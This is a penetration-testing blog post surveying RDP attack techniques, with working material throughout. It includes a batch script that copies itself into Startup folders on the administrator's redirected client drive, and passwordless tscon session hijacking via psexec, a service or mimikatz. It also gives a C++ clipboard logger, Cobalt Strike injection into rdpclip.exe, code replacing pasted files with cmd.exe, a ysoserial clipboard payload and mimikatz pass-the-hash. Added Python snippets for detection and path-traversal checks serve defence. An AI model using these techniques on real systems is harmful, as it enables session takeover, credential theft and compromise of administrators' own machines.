
Recently, on an engagement, I ran into an administrator who had connected over RDP with drive redirection enabled (a client drive mounted into the session), and I thought I would write up RDP exploitation techniques when I had time.

RDP exploitation summary

Drive redirection (\\tsclient)

There is not much to exploiting a redirected client drive beyond copying files: depending on what has been mounted you can either pull files off it or drop something into its Startup folder. Some tools automate the monitoring and copying, for example https://github.com/cnucky/DarkGuardian. DarkGuardian watches for the TSCLIENT share (the redirected drive) appearing after an RDP logon; running in the background it lists the files on the redirected drive, downloads specified files, copies a Trojan into the Startup folder on the mounted drive, and so on.


RDPInception

This method is of limited use. The idea is to drop a batch script into the server's startup items or the winlogon execution script and wait for an administrator to connect with drive redirection: when the script runs it copies itself into the Startup folder on the redirected client drive (\\tsclient\c), so it executes on the administrator's own machine the next time they log on.

@echo off
echo Updating Windows...
@echo off
timeout 1 >nul 2>&1
mkdir \\tsclient\c\temp >nul 2>&1
mkdir C:\temp >nul 2>&1
copy run.bat C:\temp >nul 2>&1
copy run.bat \\tsclient\c\temp >nul 2>&1
del /q %TEMP%\temp_00.txt >nul 2>&1
set dirs=dir /a:d /b /s C:\users\*Startup*
set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup*
echo|%dirs%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
echo|%dirs2%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
for /F "tokens=*" %%a in (%TEMP%\temp_00.txt) DO (
    copy run.bat "%%a" >nul 2>&1
    copy C:\temp\run.bat "%%a" >nul 2>&1
    copy \\tsclient\c\temp\run.bat "%%a" >nul 2>&1
)
del /q %TEMP%\temp_00.txt >nul 2>&1
REM if "WINDOMAIN"=="%USERDOMAIN%" ( cmd.exe /c calc.exe )

RDP Session Hijacking

The key command is tscon. Normally you have to supply the target session's password to switch to it, but when running as SYSTEM you can connect to any other user's session without a password, effectively taking over that session.

This technique applies to Windows 7 and later. Typical scenarios: on Windows Server 2012 and later plaintext passwords are no longer cached by default, so instead of recovering a password you switch straight into the target user's session; or, if your current foothold is only a local account, you switch into a logged-on domain user's session and inherit their rights.

First escalate to SYSTEM locally with psexec (creating a service manually does the same job, see below). The Shift (sethc) / Utilman backdoor can also be used to reach a SYSTEM shell at the logon screen without a password.

1. psexec

C:\Windows\system32>quser
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator         rdp-tcp#1           1  Active          .  2020/12/14 11:14
 test                  rdp-tcp#0           2  Active       1:02  2020/12/14 13:04

C:\Windows\system32>tscon 2 /dest:rdp-tcp#1

Here the SYSTEM shell obtained with psexec -s runs inside the administrator's own RDP session (rdp-tcp#1); tscon connects session 2 (the user test) to that display, so the test user's desktop appears without any password prompt.

2. Services

A service runs as SYSTEM, so wrapping tscon in a service binpath gives the same result without psexec:

quser
sc create sesshijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#1"
net start sesshijack

3. mimikatz

privilege::debug
ts::sessions
token::elevate
ts::remote /id:2

ts::sessions lists the sessions, token::elevate impersonates SYSTEM, and ts::remote /id:2 connects session 2 to the current one.

4. Shift (sticky keys) passwordless hijacking

Plant the Shift backdoor through COM hijacking from a webshell; it then gives a SYSTEM shell at the logon screen, from which tscon can be run against any session without a password.
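The defender's view of the four variants above, as an added example in Python (not from the original post): process-creation records in the shape of Sysmon Event ID 1 / Security 4688 fields are constructed inline, and the field names and the heuristic are my assumptions. It flags tscon running in a SYSTEM context, which legitimate use never needs, and `sc create` with tscon in the binpath.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed process-creation records (Sysmon Event ID 1 / Security 4688 style fields).
# These are made up for the example, not telemetry from the page.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # 0: a user reconnecting a session with a password - legitimate tscon use
        "Image": r"C:\Windows\System32\tscon.exe",
        "CommandLine": r"tscon 3 /password:Winter2020!",
        "User": r"CORP\alice",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # 1: tscon from a psexec -s shell: SYSTEM context, /dest: and no /password
        "Image": r"C:\Windows\System32\tscon.exe",
        "CommandLine": r"tscon 2 /dest:rdp-tcp#1",
        "User": r"NT AUTHORITY\SYSTEM",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # 2: the service variant being staged
        "Image": r"C:\Windows\System32\sc.exe",
        "CommandLine": r'sc create sesshijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#1"',
        "User": r"CORP\admin",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # 3: routine sc usage - legitimate
        "Image": r"C:\Windows\System32\sc.exe",
        "CommandLine": r"sc query TermService",
        "User": r"CORP\admin",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # 4: the staged service firing: services.exe runs the binpath as SYSTEM
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /k tscon 2 /dest:rdp-tcp#1",
        "User": r"NT AUTHORITY\SYSTEM",
        "ParentImage": r"C:\Windows\System32\services.exe",
    },
]

# tscon anywhere in a command line: bare, with .exe, or as the tail of a full path
TSCON_RE = re.compile(r'(?:^|[\s"\\])tscon(?:\.exe)?\b', re.IGNORECASE)
SC_CREATE_RE = re.compile(r"\bcreate\b.*\bbinpath\s*=", re.IGNORECASE)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_system(user: str) -> bool:
    u = user.lower()
    return u == "system" or u.endswith("\\system")


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a reason if the record looks like tscon-based session hijacking, else None."""
    img = image_name(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    mentions_tscon = img == "tscon.exe" or TSCON_RE.search(cmd) is not None
    # Legitimate tscon is typed by an interactive user and needs /password for another
    # user's session; tscon in a SYSTEM context is the passwordless takeover.
    if mentions_tscon and is_system(event.get("User", "")):
        return "tscon in SYSTEM context (passwordless session takeover)"
    # Staging of method 2: a service whose binpath wraps tscon
    if img == "sc.exe" and SC_CREATE_RE.search(cmd) and TSCON_RE.search(cmd):
        return "service created with tscon in binpath"
    return None


def find_hijacks(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Index and reason for every record classify() flags."""
    return [(i, r) for i, ev in enumerate(events) if (r := classify(ev))]


if __name__ == "__main__":
    for idx, reason in find_hijacks(SAMPLE_EVENTS):
        print(f"event {idx}: {reason} :: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Method 3 (mimikatz ts::remote) drives the terminal-services API directly and does not need to spawn tscon.exe, so process telemetry alone does not see it; the mimikatz process itself and the session reconnect events in the Security log are what remain to correlate.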

Abusing rdpclip.exe

The RDP clipboard lets text and files be copied and pasted between client and server; it is implemented by the rdpclip.exe process. To see exactly what happens during a copy, use ClipSpy to watch the clipboard change.

I have seen many published techniques in ATT&CK that use the clipboard to grab copied text, and https://research.checkpoint.com/2019/reverse-rdp-attack-code-execution-on-rdp-clients/ suggests another approach: hooking rdpclip.exe.

1. Clipboard monitoring

Poll the clipboard every 10 seconds and append any new text to a local file (the code below backs off for five minutes when nothing has changed).

#include <exception>
#include <iostream>
#include <ostream>
#include <stdexcept>
#include <string>
#include <fstream>
#include <windows.h>

using namespace std;

// RAII wrapper: open the clipboard on construction, close it on destruction
class RaiiClipboard
{
public:
    RaiiClipboard()
    {
        if (!OpenClipboard(NULL))
            throw runtime_error("Can't open clipboard.");
        // ... or define some custom exception class for clipboard errors.
    }
    ~RaiiClipboard()
    {
        CloseClipboard();
    }
private:
    // non-copyable
    RaiiClipboard(const RaiiClipboard&);
    RaiiClipboard& operator=(const RaiiClipboard&);
};

// RAII wrapper around GlobalLock/GlobalUnlock for the CF_TEXT handle
class RaiiTextGlobalLock
{
public:
    explicit RaiiTextGlobalLock(HANDLE hData)
        : m_hData(hData)
    {
        m_psz = static_cast<const char*>(GlobalLock(m_hData));
        if (!m_psz)
            throw runtime_error("Can't acquire lock on clipboard text.");
    }
    ~RaiiTextGlobalLock()
    {
        GlobalUnlock(m_hData);
    }
    const char* Get() const
    {
        return m_psz;
    }
private:
    HANDLE m_hData;
    const char* m_psz;
    // non-copyable
    RaiiTextGlobalLock(const RaiiTextGlobalLock&);
    RaiiTextGlobalLock& operator=(const RaiiTextGlobalLock&);
};

// Read the current clipboard text (CF_TEXT, ANSI); empty string if no text is present
string GetClipboardText()
{
    RaiiClipboard clipboard;
    HANDLE hData = GetClipboardData(CF_TEXT);
    if (hData == NULL) {
        return "";
        // throw runtime_error("Can't get clipboard text.");
    }
    RaiiTextGlobalLock textGlobalLock(hData);
    string text(textGlobalLock.Get());
    return text;
}

// Append captured text to info.txt in the working directory
void SaveData(string data) {
    ofstream out("info.txt", ios::app);
    if (out.is_open())
    {
        out << data << '\n';
        out << "------------------------------\n";
        out.close();
    }
}

int main()
{
    static const int kExitOk = 0;
    static const int kExitError = 1;
    string data1 = "";
    string data2 = "";
    try
    {
        while (true) {
            data2 = GetClipboardText();
            if (data1 != data2) {
                cout << data2 << endl;
                SaveData(data2);
            }
            else {
                cout << "waiting for clip acting." << endl;
                Sleep(300000);   // nothing new: back off for five minutes
            }
            data1 = data2;
            Sleep(10000);        // poll every 10 seconds
        }
        return kExitOk;
    }
    catch (const exception& e)
    {
        cerr << "*** ERROR: " << e.what() << endl;
        return kExitError;
    }
}

Following the Cheesy Rumbles article, Get-ClipboardContents.ps1 also reads the clipboard, and by injecting into the rdpclip.exe process of another RDP session it reads that session's clipboard too. The Cobalt Strike Beacon commands:

 PID   PPID  Name          Arch  Session  User
 3924  888   rdpclip.exe   x64   3        DMZ2\rasta

inject 3924 x64 smb
powershell-import D:\Tools\Get-ClipboardContents.ps1
powershell Get-ClipboardContents -PollInterval 1

2. Attacking the RDP client in reverse

How do you push a file back to the administrator's machine when no drive is redirected? I found two approaches online.

1. Hook the GetClipboardData and DragQueryFileW functions, which work in a similar way. After two days of debugging I finally got it working with help from friends.

2. Later I realised that, since the previous section can read the clipboard contents, I can also alter the file the administrator copies.

CVE-2019-0887

Li Yongde's idea is the same as the one given in the paper. Because the file name is taken with wcsrchr(szFile, '\\'), and Windows also accepts paths written with forward slashes (./ style), the server can make the client write outside the intended directory; the root cause is similar to the WinRAR path traversal bug.

Use the Detours library to hook GetClipboardData and DragQueryFileW and inject file data and paths to get the final effect.

Replace the clipboard file

#include <iostream>
#include <cstring>
#include <windows.h>
#include <shlobj.h>

int CopyFileToClipboard(char szFileName[]);

int main()
{
    // Put cmd.exe on the clipboard as a file drop; rdpclip syncs it to the client
    CopyFileToClipboard("C:\\windows\\system32\\cmd.exe");
    return 0;
}

int CopyFileToClipboard(char szFileName[])
{
    UINT uDropEffect;
    HGLOBAL hGblEffect;
    LPDWORD lpdDropEffect;
    DROPFILES stDrop;
    HGLOBAL hGblFiles;
    LPSTR lpData;

    // "Preferred DropEffect" tells the paste target whether this is a copy or a move
    uDropEffect = RegisterClipboardFormatA("Preferred DropEffect");
    hGblEffect = GlobalAlloc(GMEM_ZEROINIT | GMEM_MOVEABLE | GMEM_DDESHARE, sizeof(DWORD));
    lpdDropEffect = (LPDWORD)GlobalLock(hGblEffect);
    *lpdDropEffect = DROPEFFECT_COPY;   // copy; use DROPEFFECT_MOVE for cut-and-paste
    GlobalUnlock(hGblEffect);

    // DROPFILES header followed by a NUL-separated, double-NUL-terminated ANSI path list
    stDrop.pFiles = sizeof(DROPFILES);
    stDrop.pt.x = 0;
    stDrop.pt.y = 0;
    stDrop.fNC = FALSE;
    stDrop.fWide = FALSE;               // ANSI strings, not UTF-16
    hGblFiles = GlobalAlloc(GMEM_ZEROINIT | GMEM_MOVEABLE | GMEM_DDESHARE,
                            sizeof(DROPFILES) + strlen(szFileName) + 2);
    lpData = (LPSTR)GlobalLock(hGblFiles);
    memcpy(lpData, &stDrop, sizeof(DROPFILES));
    strcpy(lpData + sizeof(DROPFILES), szFileName);   // the +2 zeroed bytes end the list
    GlobalUnlock(hGblFiles);

    OpenClipboard(NULL);
    EmptyClipboard();
    SetClipboardData(CF_HDROP, hGblFiles);
    SetClipboardData(uDropEffect, hGblEffect);
    CloseClipboard();
    return 1;
}

After this runs, when the administrator copies any file from the server and pastes it on their own machine, what arrives is cmd.exe.
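The CF_HDROP payload the code above builds, and the client-side check that the path-traversal bug calls for, as an added example in Python (not from the original post and not Microsoft's fix): build_cf_hdrop packs the same DROPFILES header and NUL-separated list the C code does and parse_cf_hdrop reads it back honouring pFiles and fWide; naive_check splits only on the backslash, the kind of separator handling the page points at, while hardened_check first folds forward slashes into backslashes so a forward-slash ../ is seen as traversal. The file names are constructed for the example.

```python
import struct
from typing import List

# DROPFILES header: DWORD pFiles, POINT pt (LONG x, LONG y), BOOL fNC, BOOL fWide = 20 bytes
DROPFILES_FMT = "<IiiII"
DROPFILES_SIZE = struct.calcsize(DROPFILES_FMT)  # 20


def build_cf_hdrop(paths: List[str], wide: bool = True) -> bytes:
    """Serialise a CF_HDROP payload: DROPFILES header, then the file list.
    Each path is NUL-terminated and the whole list ends with one extra NUL."""
    enc = "utf-16-le" if wide else "latin-1"   # latin-1 stands in for the ANSI code page
    nul = "\x00".encode(enc)
    body = b"".join(p.encode(enc) + nul for p in paths) + nul
    header = struct.pack(DROPFILES_FMT, DROPFILES_SIZE, 0, 0, 0, 1 if wide else 0)
    return header + body


def parse_cf_hdrop(blob: bytes) -> List[str]:
    """Inverse of build_cf_hdrop: read pFiles and fWide from the header, not assumptions."""
    pfiles, _x, _y, _fnc, fwide = struct.unpack_from(DROPFILES_FMT, blob, 0)
    enc = "utf-16-le" if fwide else "latin-1"
    text = blob[pfiles:].decode(enc)
    names: List[str] = []
    for part in text.split("\x00"):
        if part == "":          # an empty entry is the terminating double NUL
            break
        names.append(part)
    return names


def _components_ok(parts: List[str]) -> bool:
    # Reject empty components (leading separator, UNC prefix), dot entries and drive letters.
    return bool(parts) and all(p not in ("", ".", "..") and ":" not in p for p in parts)


def naive_check(name: str) -> bool:
    """Only the backslash is treated as a separator, so '../x' is a single harmless-looking name."""
    return _components_ok(name.split("\\"))


def hardened_check(name: str) -> bool:
    """Fold forward slashes to backslashes first; Windows file APIs accept both."""
    return _components_ok(name.replace("/", "\\").split("\\"))


if __name__ == "__main__":
    blob = build_cf_hdrop([r"C:\windows\system32\cmd.exe"], wide=False)  # what the C code produces
    print(parse_cf_hdrop(blob))
    for n in (r"docs\report.txt", r"..\..\Startup\run.bat", "../../Startup/run.bat"):
        print(f"{n!r:32} naive={naive_check(n)} hardened={hardened_check(n)}")
```

Rejecting components by name is the minimum: a real client must apply the check to the canonicalised path it will actually open, and also deal with trailing dots and spaces and with reserved device names, none of which this example covers.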


.NET Deserialization

See the idea introduced in `https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/december/beware-of-deserialisation-in-.net-methods-and-classes-code-execution-via-paste/`. (I never expected it could be played this way.)

Tool: `https://github.com/pwntester/ysoserial.net`

The attack replaces the clipboard contents with a serialized payload; some applications deserialize clipboard data when you paste into them, which triggers the gadget chain. If the target .NET application runs with higher privileges, this also works as privilege escalation: the current user does not have the administrator's UAC password, but an administrator has earlier opened a .NET application elevated through UAC and pastes into it.

ysoserial.exe -p Clipboard -c calc -F System.String

Tested programs:

PowerShell ISE
Visual Studio
Paint

Any WPF application that uses TextBox, PasswordBox or RichTextBox is affected as well.

RDP PtH (pass-the-hash)

Logging on over RDP with a user's hash instead of a password.

mstsc

The server must support Restricted Admin mode: it is built in from Windows 8.1 / Windows Server 2012 R2, and Windows 7 / Windows Server 2008 R2 gain it with patches KB2871997 and KB2973351. The client must also support Restricted Admin mode (mstsc /restrictedadmin).

Enable Restricted Admin mode on the server:

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

Once enabled, mstsc.exe /restrictedadmin logs on without prompting for a password: the credentials of the current logon session (the NTLM hash) are used for authentication.

Mimikatz

mimikatz.exe
privilege::debug
sekurlsa::pth /user:fbiwarning /domain:172.16.142.136 /ntlm:44f9ea6a7743a8ea6f1956384c39887b "/run:mstsc.exe /restrictedadmin"
